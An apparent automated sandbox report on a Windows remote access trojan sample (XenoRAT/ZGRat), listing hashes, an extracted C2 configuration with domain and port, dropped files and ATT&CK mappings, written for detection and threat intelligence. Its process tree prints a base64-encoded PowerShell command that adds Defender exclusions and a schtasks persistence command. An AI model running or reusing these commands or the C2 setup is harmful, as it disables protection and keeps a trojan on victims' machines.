xenorat | 80b98aa859cff943bece9831f7de94656292ff5147db30a9e315ee30553425c2

Analysis

max time kernel
38s
max time network
29s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
24-04-2024 21:16

Sharing

Reason

Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-24T21:17:41Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win11-20240412-en/instance_6-dirty.qcow2\"}"

Report Analysis Logs

General

Target

EchoLogger.exe
Size

5.6MB
MD5

0b1f4455971b59cd0943b78ac80d1f95
SHA1

54da81385d5d67bfb925ddd7b5dbf2bae923cce5
SHA256

80b98aa859cff943bece9831f7de94656292ff5147db30a9e315ee30553425c2
SHA512

5805d67ab91d32d203433a299943bfde35a65945ebb7861b770c4a00a9adfd3938c6c347e7a1eb120de9240edd2452a0b8d1af9664ff0d6f50cbb4e5ed042c5f
SSDEEP

98304:Y9r1U+si7I0QgV8uPYo/FrjoYPLCr2P5+yvNAyAkkYgGquVIia2kJb8WG9sE68gB:aSUIsV8uASFrjjW0+aAukqZ24zgRm2u2

Score

10^/10

xenorat zgrat rat trojan

Malware Config

Extracted

Family

xenorat

jctestwindows.airdns.org

Mutex

Xeno_rat_nd8912d

Attributes

delay
5000
install_path
appdata
port
45010
startup_name
ErrorManager

Signatures

Detect ZGRat V1 34 IoCs

resource	yara_rule
behavioral1/memory/2928-34-0x00000000024B0000-0x000000000251C000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-38-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-39-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-42-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-47-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-73-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-68-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-56-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-78-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-83-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-85-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-88-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-91-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-93-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-95-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-99-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-97-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-101-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-103-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-105-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-107-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-109-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-111-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-129-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-131-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-133-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-135-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-137-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-140-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-142-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-144-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-147-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-149-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1
behavioral1/memory/2928-151-0x00000000024B0000-0x0000000002515000-memory.dmp	family_zgrat_v1

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Executes dropped EXE 4 IoCs

pid	Process
2928	Ilkdt.exe
2732	WinHostMgr.exe
3744	WindowsSubsystem.exe
1684	WindowsSubsystem.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3460	schtasks.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2256	powershell.exe
2256	powershell.exe
2256	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2928	Ilkdt.exe
Token: SeDebugPrivilege	2256	powershell.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3940 wrote to memory of 2256	3940	EchoLogger.exe	92
PID 3940 wrote to memory of 2256	3940	EchoLogger.exe	92
PID 3940 wrote to memory of 2256	3940	EchoLogger.exe	92
PID 3940 wrote to memory of 2928	3940	EchoLogger.exe	94
PID 3940 wrote to memory of 2928	3940	EchoLogger.exe	94
PID 3940 wrote to memory of 2928	3940	EchoLogger.exe	94
PID 3940 wrote to memory of 2732	3940	EchoLogger.exe	95
PID 3940 wrote to memory of 2732	3940	EchoLogger.exe	95
PID 3940 wrote to memory of 3744	3940	EchoLogger.exe	96
PID 3940 wrote to memory of 3744	3940	EchoLogger.exe	96
PID 3940 wrote to memory of 3744	3940	EchoLogger.exe	96
PID 3744 wrote to memory of 1684	3744	WindowsSubsystem.exe	97
PID 3744 wrote to memory of 1684	3744	WindowsSubsystem.exe	97
PID 3744 wrote to memory of 1684	3744	WindowsSubsystem.exe	97
PID 1684 wrote to memory of 3460	1684	WindowsSubsystem.exe	98
PID 1684 wrote to memory of 3460	1684	WindowsSubsystem.exe	98
PID 1684 wrote to memory of 3460	1684	WindowsSubsystem.exe	98

C:\Users\Admin\AppData\Local\Temp\EchoLogger.exe
"C:\Users\Admin\AppData\Local\Temp\EchoLogger.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3940
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAcwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAawB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcgB5ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2256
- C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe
  "C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2928
- C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"
  2⤵
  - Executes dropped EXE
  PID:2732
- C:\Users\Admin\AppData\Local\Temp\WindowsSubsystem.exe
  "C:\Users\Admin\AppData\Local\Temp\WindowsSubsystem.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3744
- - C:\Users\Admin\AppData\Roaming\XenoManager\WindowsSubsystem.exe
    "C:\Users\Admin\AppData\Roaming\XenoManager\WindowsSubsystem.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1684
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /Create /TN "ErrorManager" /XML "C:\Users\Admin\AppData\Local\Temp\tmpCD72.tmp" /F
      4⤵
      Creates scheduled task(s)
      PID:3460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe

Filesize
191KB

MD5
e004a568b841c74855f1a8a5d43096c7

SHA1
b90fd74593ae9b5a48cb165b6d7602507e1aeca4

SHA256
d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db

SHA512
402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af

Download Submit
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe

Filesize
5.0MB

MD5
e222309197c5e633aa8e294ba4bdcd29

SHA1
52b3f89a3d2262bf603628093f6d1e71d9cc3820

SHA256
047a7ca1b8848c1c0e3c0fcc6ece056390760b24580f27f6966b86b0c2a1042b

SHA512
9eb37686e0cee9ec18d12a4edd37c8334d26650c74eae5b30231c2b0db1628d52848123c9348c3da306ec950b827ec0a56cdf43ee325a9e280022c68193d8503

Download Submit
C:\Users\Admin\AppData\Local\Temp\WindowsSubsystem.exe

Filesize
43KB

MD5
6b44f7785d4ce45ede1b02681227d987

SHA1
444d76fb81d4fbeb9c1a2011d2de8f2b8ff0084a

SHA256
2c85b511ff201346d1e6c2ab300445ad263ed40192c1748ec10fa02f6aa05186

SHA512
83f96b49bf619aa8fd89a7fb7be282d7a06e6ae0dd8f42ef8ad9e1832a889d9dc3b8920989cea5fbecfec63dd894f49d5ad1d2d25894de7b523add0539d1de55

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0izvgxy.jpj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCD72.tmp

Filesize
1KB

MD5
0cd3da1799bc79141a8e8b219f395b48

SHA1
53d117d84f3ba1066b59720965e25a84792439a5

SHA256
8bb355c414170a13cc47f16128844bac5089e9c845f7d07d4d098579b7c152d6

SHA512
686ef43213a06ba50e3b78c1f84782cbc2e8a87f97c297addf8bea5d78346420fd143dd7d4aa7f95a7827c2db4fd27c15cfec44fef6e700351cff887afc8e536

Download Submit
memory/1684-80-0x0000000005440000-0x0000000005450000-memory.dmp

Filesize
64KB

Download
memory/1684-74-0x00000000735F0000-0x0000000073DA1000-memory.dmp

Filesize
7.7MB

Download
memory/2256-127-0x0000000007A80000-0x0000000007A9A000-memory.dmp

Filesize
104KB

Download
memory/2256-126-0x00000000080C0000-0x000000000873A000-memory.dmp

Filesize
6.5MB

Download
memory/2256-37-0x00000000735F0000-0x0000000073DA1000-memory.dmp

Filesize
7.7MB

Download
memory/2256-191-0x0000000007CE0000-0x0000000007CF5000-memory.dmp

Filesize
84KB

Download
memory/2256-178-0x0000000007CD0000-0x0000000007CDE000-memory.dmp

Filesize
56KB

Download
memory/2256-146-0x0000000007C90000-0x0000000007CA1000-memory.dmp

Filesize
68KB

Download
memory/2256-44-0x0000000002F10000-0x0000000002F20000-memory.dmp

Filesize
64KB

Download
memory/2256-139-0x0000000007D10000-0x0000000007DA6000-memory.dmp

Filesize
600KB

Download
memory/2256-128-0x0000000007B10000-0x0000000007B1A000-memory.dmp

Filesize
40KB

Download
memory/2256-89-0x0000000006770000-0x00000000067BC000-memory.dmp

Filesize
304KB

Download
memory/2256-46-0x0000000002F10000-0x0000000002F20000-memory.dmp

Filesize
64KB

Download
memory/2256-57-0x0000000005890000-0x00000000058B2000-memory.dmp

Filesize
136KB

Download
memory/2256-201-0x0000000007DD0000-0x0000000007DEA000-memory.dmp

Filesize
104KB

Download
memory/2256-36-0x0000000005920000-0x0000000005F4A000-memory.dmp

Filesize
6.2MB

Download
memory/2256-30-0x00000000052B0000-0x00000000052E6000-memory.dmp

Filesize
216KB

Download
memory/2256-125-0x0000000007920000-0x00000000079C4000-memory.dmp

Filesize
656KB

Download
memory/2256-75-0x00000000061A0000-0x0000000006206000-memory.dmp

Filesize
408KB

Download
memory/2256-124-0x0000000006D60000-0x0000000006D7E000-memory.dmp

Filesize
120KB

Download
memory/2256-115-0x0000000075200000-0x000000007524C000-memory.dmp

Filesize
304KB

Download
memory/2256-113-0x0000000006CE0000-0x0000000006D14000-memory.dmp

Filesize
208KB

Download
memory/2256-219-0x0000000007DC0000-0x0000000007DC8000-memory.dmp

Filesize
32KB

Download
memory/2256-79-0x00000000062D0000-0x0000000006336000-memory.dmp

Filesize
408KB

Download
memory/2256-114-0x000000007F880000-0x000000007F890000-memory.dmp

Filesize
64KB

Download
memory/2256-222-0x00000000735F0000-0x0000000073DA1000-memory.dmp

Filesize
7.7MB

Download
memory/2256-82-0x0000000006340000-0x0000000006697000-memory.dmp

Filesize
3.3MB

Download
memory/2256-87-0x0000000006740000-0x000000000675E000-memory.dmp

Filesize
120KB

Download
memory/2928-93-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-47-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-91-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-85-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-95-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-99-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-97-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-101-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-103-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-105-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-107-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-109-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-111-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-83-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-78-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-27-0x0000000000070000-0x00000000000A6000-memory.dmp

Filesize
216KB

Download
memory/2928-56-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-68-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-73-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-88-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-42-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-129-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-131-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-133-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-135-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-137-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-140-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-43-0x0000000004B00000-0x0000000004B10000-memory.dmp

Filesize
64KB

Download
memory/2928-142-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-144-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-33-0x00000000735F0000-0x0000000073DA1000-memory.dmp

Filesize
7.7MB

Download
memory/2928-147-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-149-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-151-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-39-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-38-0x00000000024B0000-0x0000000002515000-memory.dmp

Filesize
404KB

Download
memory/2928-34-0x00000000024B0000-0x000000000251C000-memory.dmp

Filesize
432KB

Download
memory/3744-32-0x0000000000C50000-0x0000000000C62000-memory.dmp

Filesize
72KB

Download
memory/3744-40-0x00000000735F0000-0x0000000073DA1000-memory.dmp

Filesize
7.7MB

Download
memory/3744-76-0x00000000735F0000-0x0000000073DA1000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads